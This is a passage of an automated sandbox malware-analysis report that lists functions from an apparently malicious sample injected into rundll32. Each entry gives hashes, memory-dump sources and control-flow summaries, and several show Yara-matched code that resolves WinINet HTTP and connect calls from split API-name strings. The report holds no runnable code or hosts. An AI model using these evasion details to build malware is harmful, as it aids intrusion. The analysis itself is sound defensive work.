                                                                        • Opcode ID: 32ec4589db973b377f866f5bae2a138e5c880b65c06659529e9583f67a51e1d2
                                                                        • Instruction ID: 70682c009dddcd28ebbb5cbe46bdba0ac048b46bdb8c09a9149f714afcd70872
                                                                        • Opcode Fuzzy Hash: 32ec4589db973b377f866f5bae2a138e5c880b65c06659529e9583f67a51e1d2
                                                                        • Instruction Fuzzy Hash: 61900265311004032105A5590704507008697D5395351C521F200A6A0CD665D8656161
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 048396D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.948675558.00000000047D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047D0000, based on PE: true
                                                                        • Associated: 0000000B.00000002.948820864.00000000048EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.948834745.00000000048EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_47d0000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 0b9880150ca0c342c020508b4d546646267115fee20ca247531430a5460bc604
                                                                        • Instruction ID: 881ab48004a77da7f1c32cf482515482f015192cb540b0c8ecf7a547de802dbb
                                                                        • Opcode Fuzzy Hash: 0b9880150ca0c342c020508b4d546646267115fee20ca247531430a5460bc604
                                                                        • Instruction Fuzzy Hash: 2F90027130100C42F10061594404B46004597E0345F51C516A11197A4D8659D8557561
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 048396E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.948675558.00000000047D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047D0000, based on PE: true
                                                                        • Associated: 0000000B.00000002.948820864.00000000048EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.948834745.00000000048EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_47d0000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: a4b81f0a2b05a17002321134f6ad9f3c50a129ea419fbbc77d3eec1d1b9dbe50
                                                                        • Instruction ID: 86cbdf2cc0dedb7da70cb635df0f16dedcf453065c729a02b71c98b96fbc1494
                                                                        • Opcode Fuzzy Hash: a4b81f0a2b05a17002321134f6ad9f3c50a129ea419fbbc77d3eec1d1b9dbe50
                                                                        • Instruction Fuzzy Hash: F390027130108C02F1106159840474A004597D0345F55C911A54197A8D86D9D8957161
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 04839650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.948675558.00000000047D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047D0000, based on PE: true
                                                                        • Associated: 0000000B.00000002.948820864.00000000048EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.948834745.00000000048EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_47d0000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: f02cee3a6cedb7d42585e518bbd279d9f0b9b23ea67d24eab829bf3a8f7b4558
                                                                        • Instruction ID: bf54d98cd9f2b584c6981ac5038c789396f88ee3f837f597243fd41a93f1f7a9
                                                                        • Opcode Fuzzy Hash: f02cee3a6cedb7d42585e518bbd279d9f0b9b23ea67d24eab829bf3a8f7b4558
                                                                        • Instruction Fuzzy Hash: 4090027130504C42F14071594404A46005597D0349F51C511A10597E4D9669DD59B6A1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 04839660 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.948675558.00000000047D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047D0000, based on PE: true
                                                                        • Associated: 0000000B.00000002.948820864.00000000048EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.948834745.00000000048EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_47d0000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: c01df0c4bfac27a03dde801aee32f06c082bd252730cef9c5af7539dd1ea31a9
                                                                        • Instruction ID: 64e8c36fb3facbfe3905c47f8f72c3125289c131737df3ecdc0a7b91944ae823
                                                                        • Opcode Fuzzy Hash: c01df0c4bfac27a03dde801aee32f06c082bd252730cef9c5af7539dd1ea31a9
                                                                        • Instruction Fuzzy Hash: 0C90027130100C02F1807159440464A004597D1345F91C515A101A7A4DCA59DA5D77E1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 04839780 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.948675558.00000000047D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047D0000, based on PE: true
                                                                        • Associated: 0000000B.00000002.948820864.00000000048EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.948834745.00000000048EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_47d0000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 5d156c9bffdd2c9d48c9768eb5a3c08cbc40824867f637c4f8186eccdb4575c5
                                                                        • Instruction ID: 18f8d79259e5be3975857de78bde7c2c3a4e772dd161aa01a4db46a9fc7ec066
                                                                        • Opcode Fuzzy Hash: 5d156c9bffdd2c9d48c9768eb5a3c08cbc40824867f637c4f8186eccdb4575c5
                                                                        • Instruction Fuzzy Hash: E590026931300402F1807159540860A004597D1246F91D915A100A6A8CC959D86D6361
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 04839FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.948675558.00000000047D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047D0000, based on PE: true
                                                                        • Associated: 0000000B.00000002.948820864.00000000048EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.948834745.00000000048EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_47d0000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: a98ee5c1c10b28fd389bce0d10b0e2aafb8bee5b5df9e02f9d5c1c3c78765627
                                                                        • Instruction ID: 10cc47f37ecdcc9be3d1997857163d04e558096a653cad9fe608ed8b1237eb28
                                                                        • Opcode Fuzzy Hash: a98ee5c1c10b28fd389bce0d10b0e2aafb8bee5b5df9e02f9d5c1c3c78765627
                                                                        • Instruction Fuzzy Hash: 9090027131114802F11061598404706004597D1245F51C911A18196A8D86D9D8957162
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 04839710 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.948675558.00000000047D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047D0000, based on PE: true
                                                                        • Associated: 0000000B.00000002.948820864.00000000048EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.948834745.00000000048EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_47d0000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 3b3c01b180e25623ce16c0ef26cb957e853cdbbc4a44efcdf3638cce76b07124
                                                                        • Instruction ID: 2a6076bdd29dfff9ad3b389a85729afc2ccd0f303ceef1bbd7cf4b1b0414a7ed
                                                                        • Opcode Fuzzy Hash: 3b3c01b180e25623ce16c0ef26cb957e853cdbbc4a44efcdf3638cce76b07124
                                                                        • Instruction Fuzzy Hash: 9190027130100802F10065995408646004597E0345F51D511A60196A5EC6A9D8957171
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 04839840 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.948675558.00000000047D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047D0000, based on PE: true
                                                                        • Associated: 0000000B.00000002.948820864.00000000048EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.948834745.00000000048EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_47d0000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 4a134b673377faf64f89160ee054206ab435960ee2fd5019ccb68dacd21f4873
                                                                        • Instruction ID: 551f0650ab39431e46c6ec89ee371b9b4f8cac9cbd5a995e66f7b33a75955cf1
                                                                        • Opcode Fuzzy Hash: 4a134b673377faf64f89160ee054206ab435960ee2fd5019ccb68dacd21f4873
                                                                        • Instruction Fuzzy Hash: 97900261342045527545B15944045074046A7E0285791C512A2409AA0C856AE85AE661
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 04839860 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.948675558.00000000047D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047D0000, based on PE: true
                                                                        • Associated: 0000000B.00000002.948820864.00000000048EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.948834745.00000000048EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_47d0000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: e43d7f5be0357a224b50a9a6f11aa73f8d45a0a548756c8233d0ab4ef5081980
                                                                        • Instruction ID: 59a95d2dfd311223343cea40bb65a0db0755674251adc8718d857ab27c388628
                                                                        • Opcode Fuzzy Hash: e43d7f5be0357a224b50a9a6f11aa73f8d45a0a548756c8233d0ab4ef5081980
                                                                        • Instruction Fuzzy Hash: 4D90027130100813F11161594504707004997D0285F91C912A14196A8D969AD956B161
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 048399A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.948675558.00000000047D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047D0000, based on PE: true
                                                                        • Associated: 0000000B.00000002.948820864.00000000048EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.948834745.00000000048EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_47d0000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 474bcdc7ee53d086c5660d5e7526497e0eb7274bd35989513e83213c69fa67f9
                                                                        • Instruction ID: 374667bf67246b5872075de9480f7657c2d63bf7588f13a7ad6bf53ae9b564ea
                                                                        • Opcode Fuzzy Hash: 474bcdc7ee53d086c5660d5e7526497e0eb7274bd35989513e83213c69fa67f9
                                                                        • Instruction Fuzzy Hash: A29002A134100842F10061594414B060045D7E1345F51C515E20596A4D865DDC567166
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 04839910 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.948675558.00000000047D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047D0000, based on PE: true
                                                                        • Associated: 0000000B.00000002.948820864.00000000048EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.948834745.00000000048EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_47d0000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 251bde4c6eba2201b711ed45c1018a93244ccb444e73c0f09aae7b298e900e1e
                                                                        • Instruction ID: 5995146d148bfb0bde55e3b31184bcbbb2a5f792eab3a07946570efe31099c66
                                                                        • Opcode Fuzzy Hash: 251bde4c6eba2201b711ed45c1018a93244ccb444e73c0f09aae7b298e900e1e
                                                                        • Instruction Fuzzy Hash: 359002B130100802F14071594404746004597D0345F51C511A60596A4E869DDDD976A5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 04839A50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.948675558.00000000047D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047D0000, based on PE: true
                                                                        • Associated: 0000000B.00000002.948820864.00000000048EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.948834745.00000000048EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_47d0000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 4e78597c1125a3e96d5aad316a9a5d8b86c27c1bb79223596fc8bd9e93f2ed09
                                                                        • Instruction ID: 5661dcf3fe40f10e740776bc2ba8e2f0bf347accdbb643856ac66a464a08383d
                                                                        • Opcode Fuzzy Hash: 4e78597c1125a3e96d5aad316a9a5d8b86c27c1bb79223596fc8bd9e93f2ed09
                                                                        • Instruction Fuzzy Hash: 2A90026131180442F20065694C14B07004597D0347F51C615A11496A4CC959D8656561
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00878CE0 Relevance: 15.8, APIs: 1, Strings: 8, Instructions: 48networkCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 109 878ce0-878d26 call 879280 112 878d4f-878d55 109->112 113 878d28-878d4e HttpOpenRequestA 109->113
                                                                        APIs
                                                                        • HttpOpenRequestA.WININET(RequestA,OpenRequestA,HttpOpenRequestA,00000000,?,?,?,?,?,?,?,00000000), ref: 00878D48
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.948040587.0000000000860000.00000040.80000000.00040000.00000000.sdmp, Offset: 00860000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_860000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: HttpOpenRequest
                                                                        • String ID: Http$HttpOpenRequestA$HttpOpenRequestA$Open$OpenRequestA$Requ$RequestA$estA
                                                                        • API String ID: 1984915467-4016285707
                                                                        • Opcode ID: 6b159fe5b4ef6990b8fa19b42e498d0d0852d11a6a3d6e744761cdb11140cc90
                                                                        • Instruction ID: 162983bee72da1f7a1172014d6fcf772003ad963dcae696dcd1cb36a620a0f39
                                                                        • Opcode Fuzzy Hash: 6b159fe5b4ef6990b8fa19b42e498d0d0852d11a6a3d6e744761cdb11140cc90
                                                                        • Instruction Fuzzy Hash: 4801E9B2905118AFCB14DF98D841DEF7BB9EB48210F158288FD48A7205D630ED10CBE1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00878D60 Relevance: 15.8, APIs: 1, Strings: 8, Instructions: 42networkCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 114 878d60-878d96 115 878d9f-878da6 114->115 116 878d9a call 879280 114->116 117 878dc3-878dc9 115->117 118 878da8-878dc2 HttpSendRequestA 115->118 116->115
                                                                        APIs
                                                                        • HttpSendRequestA.WININET(RequestA,SendRequestA,HttpSendRequestA,00000000,?,?,?,?,00000000), ref: 00878DBC
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.948040587.0000000000860000.00000040.80000000.00040000.00000000.sdmp, Offset: 00860000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_860000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: HttpRequestSend
                                                                        • String ID: Http$HttpSendRequestA$HttpSendRequestA$Requ$RequestA$Send$SendRequestA$estA
                                                                        • API String ID: 360639707-2503632690
                                                                        • Opcode ID: 060863964350807d476c3868b2072bbe8db5cc0a2554463cb92dd7038842eada
                                                                        • Instruction ID: dbc8f22527e98f887936bc9ddb5c368a4c2fffaa09d73dd3fda0a8cb55b2df3d
                                                                        • Opcode Fuzzy Hash: 060863964350807d476c3868b2072bbe8db5cc0a2554463cb92dd7038842eada
                                                                        • Instruction Fuzzy Hash: B4014BB2905118AFCB14DF98D845EEFBBB8EB58210F118189FD18A7205D670EE10CBE2
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00878D5A Relevance: 15.8, APIs: 1, Strings: 8, Instructions: 39networkCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 119 878d5a-878da6 call 879280 122 878dc3-878dc9 119->122 123 878da8-878dc2 HttpSendRequestA 119->123
                                                                        APIs
                                                                        • HttpSendRequestA.WININET(RequestA,SendRequestA,HttpSendRequestA,00000000,?,?,?,?,00000000), ref: 00878DBC
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.948040587.0000000000860000.00000040.80000000.00040000.00000000.sdmp, Offset: 00860000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_860000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: HttpRequestSend
                                                                        • String ID: Http$HttpSendRequestA$HttpSendRequestA$Requ$RequestA$Send$SendRequestA$estA
                                                                        • API String ID: 360639707-2503632690
                                                                        • Opcode ID: 1441d8a5a597f3afebc6d5e603e26b053b2514820df4cb0e9e036eacb6b6671f
                                                                        • Instruction ID: fa9499ed1387993e66bed67599039056f939eca09803481b084596c40f528763
                                                                        • Opcode Fuzzy Hash: 1441d8a5a597f3afebc6d5e603e26b053b2514820df4cb0e9e036eacb6b6671f
                                                                        • Instruction Fuzzy Hash: D80178B2905159AFCB10DF98C845EBF7BB8EF58310F118288FD58AB205C370EA11CBA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00878C60 Relevance: 14.0, APIs: 1, Strings: 7, Instructions: 48networkCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 124 878c60-878c96 125 878c9f-878ca6 124->125 126 878c9a call 879280 124->126 127 878ccf-878cd5 125->127 128 878ca8-878cce InternetConnectA 125->128 126->125
                                                                        APIs
                                                                        • InternetConnectA.WININET(ConnectA,rnetConnectA,InternetConnectA,00000000,?,?,?,?,?,?,?,00000000), ref: 00878CC8
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.948040587.0000000000860000.00000040.80000000.00040000.00000000.sdmp, Offset: 00860000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_860000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ConnectInternet
                                                                        • String ID: Conn$ConnectA$Inte$InternetConnectA$ectA$rnet$rnetConnectA
                                                                        • API String ID: 3050416762-1024195942
                                                                        • Opcode ID: e9d4327f2bb71f8205cc64fa2e4d81570f0b41d01b4edd9f02fef6293a995184
                                                                        • Instruction ID: f6671e92884dce56bbc4f8d381dd1b29139907c45b8e52f1f39b72679210fff8
                                                                        • Opcode Fuzzy Hash: e9d4327f2bb71f8205cc64fa2e4d81570f0b41d01b4edd9f02fef6293a995184
                                                                        • Instruction Fuzzy Hash: 5F01E9B2915118AFCB14DF98D941EEF77B8EB88310F158289FE08A7245D670EE10CBE1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00878C55 Relevance: 14.0, APIs: 1, Strings: 7, Instructions: 46networkCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 129 878c55-878ca6 call 879280 132 878ccf-878cd5 129->132 133 878ca8-878cce InternetConnectA 129->133
                                                                        APIs
                                                                        • InternetConnectA.WININET(ConnectA,rnetConnectA,InternetConnectA,00000000,?,?,?,?,?,?,?,00000000), ref: 00878CC8
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.948040587.0000000000860000.00000040.80000000.00040000.00000000.sdmp, Offset: 00860000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_860000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ConnectInternet
                                                                        • String ID: Conn$ConnectA$Inte$InternetConnectA$ectA$rnet$rnetConnectA
                                                                        • API String ID: 3050416762-1024195942
                                                                        • Opcode ID: 8651868ea49dfeca28c87b27b1fb4a699bbdd71d7cdffe60f9f7e10bf1322c2d
                                                                        • Instruction ID: 956a1fcd6e8359e23dd46902da48d3b2ce853d178d0474af7d6827bf684d4531
                                                                        • Opcode Fuzzy Hash: 8651868ea49dfeca28c87b27b1fb4a699bbdd71d7cdffe60f9f7e10bf1322c2d
                                                                        • Instruction Fuzzy Hash: 0D011BB2905119AFCB14DF98C985EEF7BB8FB48310F158248FA59A7241D730EA11CBA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00878BF0 Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 41networkCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 134 878bf0-878c31 call 879280 137 878c33-878c4d InternetOpenA 134->137 138 878c4e-878c54 134->138
                                                                        APIs
                                                                        • InternetOpenA.WININET(rnetOpenA,InternetOpenA,?,?,?), ref: 00878C47
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.948040587.0000000000860000.00000040.80000000.00040000.00000000.sdmp, Offset: 00860000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_860000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: InternetOpen
                                                                        • String ID: A$Inte$InternetOpenA$Open$rnet$rnetOpenA
                                                                        • API String ID: 2038078732-3155091674
                                                                        • Opcode ID: c0a196bed35f81c17c54f7c58d3ebbc75acb376417c51fa7315e3d3d0f64fa47
                                                                        • Instruction ID: 71daf99587661872a857d2f2e370520a31a12aed0473563a62fc5e694a42e6d8
                                                                        • Opcode Fuzzy Hash: c0a196bed35f81c17c54f7c58d3ebbc75acb376417c51fa7315e3d3d0f64fa47
                                                                        • Instruction Fuzzy Hash: 9EF019B2911118AF8B14DF98DC41DEBB7B8FF88310B048589FE18A7205D631EE10CBE1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 008772F0 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 337 8772f0-87731f 338 87732b-877332 337->338 339 877326 call 87a010 337->339 340 87740c-877412 338->340 341 877338-877388 call 87a0e0 call 869b30 call 873e40 338->341 339->338 349 877390-8773a1 Sleep 341->349 350 877406-87740a 349->350 351 8773a3-8773a9 349->351 350->340 350->349 352 8773d3-8773f3 351->352 353 8773ab-8773cc call 876f20 351->353 355 8773f9-8773fc 352->355 356 8773f4 call 877120 352->356 357 8773d1 353->357 355->350 356->355 357->355
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.948040587.0000000000860000.00000040.80000000.00040000.00000000.sdmp, Offset: 00860000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_860000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Sleep
                                                                        • String ID: net.dll$wininet.dll
                                                                        • API String ID: 3472027048-1269752229
                                                                        • Opcode ID: b46d19651f90af21a7fded540b84a3abca830086b85d46aa1261d4811e5e7a81
                                                                        • Instruction ID: 6bb214fa09c5b6381a0a0c379c7afff21f6e348f417fc40fdf24c49e876f3bda
                                                                        • Opcode Fuzzy Hash: b46d19651f90af21a7fded540b84a3abca830086b85d46aa1261d4811e5e7a81
                                                                        • Instruction Fuzzy Hash: 0F31AEB6605604ABC711DF68C8A1FABB7B8FF88700F00851DFA1E9B245D730E445CBA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 008772E7 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 81sleepCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 358 8772e7-8772e9 359 87734e-877388 call 869b30 call 873e40 358->359 360 8772ec-877332 call 87a010 358->360 370 877390-8773a1 Sleep 359->370 366 87740c-877412 360->366 367 877338-87734b call 87a0e0 360->367 367->359 372 877406-87740a 370->372 373 8773a3-8773a9 370->373 372->366 372->370 374 8773d3-8773f3 373->374 375 8773ab-8773d1 call 876f20 373->375 377 8773f9-8773fc 374->377 378 8773f4 call 877120 374->378 375->377 377->372 378->377
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.948040587.0000000000860000.00000040.80000000.00040000.00000000.sdmp, Offset: 00860000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_860000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Sleep
                                                                        • String ID: net.dll$wininet.dll
                                                                        • API String ID: 3472027048-1269752229
                                                                        • Opcode ID: cccb428f4b34b901787beaa31a269cfc0e61438913d3f0d5a3f33abb6a7a77e8
                                                                        • Instruction ID: 526cf2622696d179ccb6d82de9a57f423816f4e6a63ab4a21f5d80f3e365528a
                                                                        • Opcode Fuzzy Hash: cccb428f4b34b901787beaa31a269cfc0e61438913d3f0d5a3f33abb6a7a77e8
                                                                        • Instruction Fuzzy Hash: 1121BFB2945604ABC710DF64C8A1FABB7B4FF48700F00C129FA1D9B245D770E545CB91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 008788E0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 391 8788e0-878911 call 8791d0 RtlFreeHeap
                                                                        APIs
                                                                        • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00863B93), ref: 0087890D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.948040587.0000000000860000.00000040.80000000.00040000.00000000.sdmp, Offset: 00860000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
